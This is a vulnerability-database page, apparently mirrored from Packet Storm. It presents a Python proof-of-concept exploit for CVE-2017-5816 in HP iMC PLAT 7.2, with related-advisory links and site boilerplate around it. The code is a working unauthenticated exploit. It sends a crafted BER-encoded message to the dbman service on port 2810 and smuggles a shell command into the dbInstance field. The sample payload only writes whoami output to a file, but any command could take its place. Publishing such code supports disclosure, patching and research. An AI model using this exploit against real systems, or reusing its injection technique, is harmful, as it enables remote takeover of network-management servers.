Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

HP iMC Plat 7.2 Remote Code Execution

🗓️ 02 Dec 2017 00:00:00Reported by Chris LyneType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 187 Views

HP iMC Plat 7.2 Remote Code Execution on Windows Server 2008 R2 Enterprise 64-bi

Related
Code
ReporterTitlePublishedViews
Family
0day.today		HP iMC Plat 7.2 - Remote Code Execution Exploit (2)
2 Dec 201700:00
zdt
0day.today		HPE iMC dbman RestartDB Unauthenticated Remote Command Execution Exploit
10 Jan 201800:00
zdt
Circl		CVE-2017-5816
29 Nov 201700:00
circl
CNVD		HPE Intelligent Management Center PLAT Arbitrary Code Execution Vulnerability (CNVD-2017-07183)
18 May 201700:00
cnvd
Check Point Advisories		HPE Intelligent Management Center dbman RestartDB Command Injection (CVE-2017-5816)
28 Jun 201700:00
checkpoint_advisories
CVE		CVE-2017-5816
15 Feb 201822:00
cve
Cvelist		CVE-2017-5816
15 Feb 201822:00
cvelist
Exploit DB		HP iMC Plat 7.2 - Remote Code Execution (2)
29 Nov 201700:00
exploitdb
Exploit DB		HPE iMC - dbman 'RestartDB' Remote Command Execution (Metasploit)
10 Jan 201800:00
exploitdb
exploitpack		HP iMC Plat 7.2 - Remote Code Execution (2)
29 Nov 201700:00
exploitpack
Rows per page
`#!/opt/local/bin/python2.7  
  
# Exploit Title: HP iMC Plat 7.2 dbman Opcode 10008 Command Injection RCE  
# Date: 11-29-2017  
# Exploit Author: Chris Lyne (@lynerc)  
# Vendor Homepage: www.hpe.com  
# Software Link: https://h10145.www1.hpe.com/Downloads/DownloadSoftware.aspx?SoftwareReleaseUId=16759&ProductNumber=JG747AAE&lang=en&cc=us&prodSeriesId=4176535&SaidNumber=  
# Version: iMC PLAT v7.2 (E0403) Standard  
# Tested on: Windows Server 2008 R2 Enterprise 64-bit  
# CVE : CVE-2017-5816  
# See Also: http://www.zerodayinitiative.com/advisories/ZDI-17-340/  
  
# note that this PoC will create a file 'C:\10008.txt'  
  
from pyasn1.type.univ import *  
from pyasn1.type.namedtype import *  
from pyasn1.codec.ber import encoder  
import struct  
import binascii  
import socket, sys  
  
ip = '192.168.1.74'  
port = 2810  
payload = "whoami > C:\\10008.txt"  
opcode = 10008  
  
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
sock.connect((ip, port))  
  
class DbmanMsg(Sequence):  
componentType = NamedTypes(  
NamedType('dbIp', OctetString()),  
NamedType('iDBType', Integer()),  
NamedType('dbInstance', OctetString()),  
NamedType('dbSaUserName', OctetString()),  
NamedType('dbSaPassword', OctetString()),  
NamedType('strOraDbIns', OctetString())  
)  
  
msg = DbmanMsg()  
  
msg['dbIp'] = ip  
msg['iDBType'] = 4  
msg['dbInstance'] = "a\"& " + payload + " &"  
msg['dbSaUserName'] = "b"  
msg['dbSaPassword'] = "c"  
msg['strOraDbIns'] = "d"  
  
encodedMsg = encoder.encode(msg, defMode=True)  
msgLen = len(encodedMsg)  
values = (opcode, msgLen, encodedMsg)  
s = struct.Struct(">ii%ds" % msgLen)  
packed_data = s.pack(*values)  
  
sock.send(packed_data)  
sock.close()  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
02 Dec 2017 00:00Current
7.6High risk
Vulners AI Score7.6
EPSS0.89949
hp imc plat 7.2remote code executionwindows server 2008 r2cve-2017-5816command injectionrce
187